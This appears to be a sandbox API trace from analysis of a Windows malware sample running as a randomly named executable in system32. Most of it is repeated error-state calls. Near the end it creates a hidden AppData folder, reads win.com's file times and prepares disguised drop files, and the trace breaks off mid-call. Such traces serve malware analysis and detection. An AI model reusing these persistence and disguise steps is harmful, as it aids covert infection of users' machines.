!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1eef48, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0031.878] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1ef5fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿç8ÿõ4ù\x1e", lpUsedDefaultChar=0x0) returned 256 [0031.878] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.879] SetLastError (dwErrCode=0x0) [0031.879] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.880] SetLastError (dwErrCode=0x0) [0031.880] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.881] GetLastError () returned 0x0 [0031.881] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.882] SetLastError (dwErrCode=0x0) [0031.882] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.883] SetLastError (dwErrCode=0x0) [0031.883] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.884] SetLastError (dwErrCode=0x0) [0031.884] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.885] SetLastError (dwErrCode=0x0) [0031.885] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.886] GetLastError () returned 0x0 [0031.886] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.887] GetLastError () returned 0x0 [0031.887] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.888] SetLastError (dwErrCode=0x0) [0031.888] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.889] SetLastError (dwErrCode=0x0) [0031.889] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.890] GetLastError () returned 0x0 [0031.890] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.891] GetLastError () returned 0x0 [0031.891] SetLastError (dwErrCode=0x0) [0031.892] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0031.892] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0031.892] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0031.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef978 | out: lpSystemTimeAsFileTime=0x1ef978*(dwLowDateTime=0xe0bb8870, dwHighDateTime=0x1d3dfba)) [0031.893] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ef8b0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.893] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ef798, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.893] GetLastError () returned 0x0 [0031.894] GetLastError () returned 0x0 [0031.894] GetLastError () returned 0x0 [0031.894] GetLastError () returned 0x0 [0031.894] GetLastError () returned 0x0 [0031.894] GetLastError () returned 0x0 [0031.894] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.894] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0031.894] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.894] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.894] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.894] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.894] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0031.894] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0031.894] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0031.894] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0031.894] GetLastError () returned 0xb7 [0031.894] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.894] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0031.894] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0031.894] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0031.894] wsprintfA (in: param_1=0x1ef618, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.894] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0031.894] wsprintfA (in: param_1=0x1ef514, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.895] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.895] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0031.895] CloseHandle (hObject=0x74) returned 1 [0031.895] GetLastError () returned 0x0 [0031.895] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0031.895] GetLastError () returned 0x0 [0031.895] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0031.895] GetSystemDirectoryA (in: lpBuffer=0x1ef618, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.895] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: 